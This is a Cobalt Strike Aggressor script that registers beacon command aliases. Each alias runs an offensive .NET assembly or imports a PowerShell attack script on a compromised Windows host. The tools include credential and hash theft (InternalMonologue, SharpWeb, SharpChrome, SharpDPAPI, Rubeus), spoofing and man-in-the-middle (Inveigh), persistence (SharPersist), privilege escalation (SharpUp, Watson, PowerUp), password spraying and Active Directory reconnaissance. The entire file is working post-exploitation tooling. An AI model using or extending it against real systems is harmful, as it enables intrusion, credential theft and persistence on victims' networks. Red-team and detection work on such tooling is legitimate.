Aggressor Script

Alias.cna

# GLOBAL VAR
$prefix_exe = "/tools/exe/";
$prefix_ps1 = "/tools/ps1/";

##########
##  .NET ASSEMBLIES
##########
# RUBEUS
beacon_command_register("rubeus", "Executes Rubeus assembly",
    "Usage: rubeus [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias rubeus{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "Rubeus.exe";
    $desc = "Rubeus";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# INTERNAL MONOLOGUE
beacon_command_register("internal_monologue", "Invoke a local procedure call to the NTLM authentication package, grab password hash",
    "Usage: internal_monologue \n\n" .
    "Uses execute-assembly to run the assembly.  No arguments needed \n");
alias internal_monologue{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "InternalMonologue.exe";
    $desc = "InternalMonologue";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# INVEIGH
beacon_command_register("inveigh", "Spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers",
    "Usage: inveigh [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias inveigh{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "Inveigh.exe";
    $desc = "Inveigh";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SEATBELT
beacon_command_register("seatbelt", "performs a number of 'safety checks' from both offensive and defensive perspectives.",
    "Usage: seatbelt [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias seatbelt{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "Seatbelt.exe";
    $desc = "SeatBelt";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPERSIST
beacon_command_register("sharpersist", "Windows persistence toolkit written in C#",
    "Usage: sharpersist [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpersist{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "SharPersist.exe";
    $desc = "SharPersist";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPFINDER
beacon_command_register("sharpfinder", "SharpFinder is a C# tool for enumerating files matching specific criteria on readable shares within an Active Directory domain.",
        "Usage: sharpfinder [arguments]\n\n" .
        "SharpFinder \n");
alias sharpfinder{
        local('$bid $asm $desc @args $argu');
        $bid = $1;
        $asm = $prefix_exe . "SharpFinder.exe";
        $desc = "SharPersist";
        @args = @_;
        remove(@args, $bid);
        $argu = join(' ', @args);
        if ($argu eq ""){
                blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
        }
        else{
                blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
        }
        bexecute_assembly!($bid, $asm, $argu);
}

# SHARPHOUND
beacon_command_register("sharphound", "Uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.",
    "Usage: sharphound [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharphound{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "SharpHound.exe";
    $desc = "SharpHound";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPUP
beacon_command_register("sharpup", "Privilege Escalation Checks",
    "Usage: sharpup [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpup{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "SharpUp.exe";
    $desc = "SharpUp";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPVIEW
beacon_command_register("sharpview", "C# tool to gain network situational awareness on Windows domains.",
    "Usage: sharpview [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpview{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "SharpView.exe";
    $desc = "SharpView";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPWEB
beacon_command_register("sharpweb", "Retrieve saved logins from Google Chrome, Firefox, Internet Explorer and Microsoft Edge.",
    "Usage: sharpweb [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpweb{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "SharpWeb.exe";
    $desc = "SharpWeb";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPCHROME
beacon_command_register("sharpchrome", "Retrieve Google Chrome data, such as cookies, history and saved logins.",
    "Usage: sharpchrome [arguments]\n\n" .
    "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpchrome{
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $asm = $prefix_exe . "SharpChrome.exe";
    $desc = "SharpChrome";
    @args = @_;
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, $asm, $argu);
}

# SHARPDPAPI
beacon_command_register("sharpdpapi", "Port of some Mimikatz DPAPI functionality.",
        "Usage: sharpdpapi [arguments]\n\n" .
        "Uses execute-assembly to run the assembly and takes given arguments\n");
alias sharpdpapi{
        local('$bid $asm $desc @args $argu');
        $bid = $1;
        $asm = $prefix_exe . "SharpDPAPI.exe";
        $desc = "SharpDPAPI";
        @args = @_;
        remove(@args, $bid);
        $argu = join(' ', @args);
        if ($argu eq ""){
                blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
        }
        else{
                blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
        }
        bexecute_assembly!($bid, $asm, $argu);
}

# WATSON
beacon_command_register("watson", "Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilities.",
        "Usage: watson [arguments]\n\n" .
        "Uses execute-assembly to run the assembly and takes given arguments\n");
alias watson{
        local('$bid $asm $desc @args $argu');
        $bid = $1;
        $asm = $prefix_exe . "Watson.exe";
        $desc = "Watson";
        @args = @_;
        remove(@args, $bid);
        $argu = join(' ', @args);
        if ($argu eq ""){
                blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
        }
        else{
                blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
        }
        bexecute_assembly!($bid, $asm, $argu);
}

##########
##      POWERSHELL IMPORT
##########

# PowerUp
alias powerup {
bpowershell_import($1, $prefix_ps1 . "PowerUp_Dev.ps1");
}

# PowerUpSQL
alias powerupsql {
bpowershell_import($1, $prefix_ps1 . "PowerUpSQL.ps1");
}

# PowerView_Dev
alias powerview_dev {
bpowershell_import($1, $prefix_ps1 . "PowerView_Dev.ps1");
}

# PowerView
alias powerview {
bpowershell_import($1, $prefix_ps1 . "PowerView.ps1");
}

# PasswordSpray
alias passwordspray {
bpowershell_import($1, $prefix_ps1 . "PasswordSpray.ps1");
}

# SessionGopger
alias sessiongopher {
bpowershell_import($1, $prefix_ps1 . "SessionGopher.ps1");
}
Alias.cna​

Alias.cna
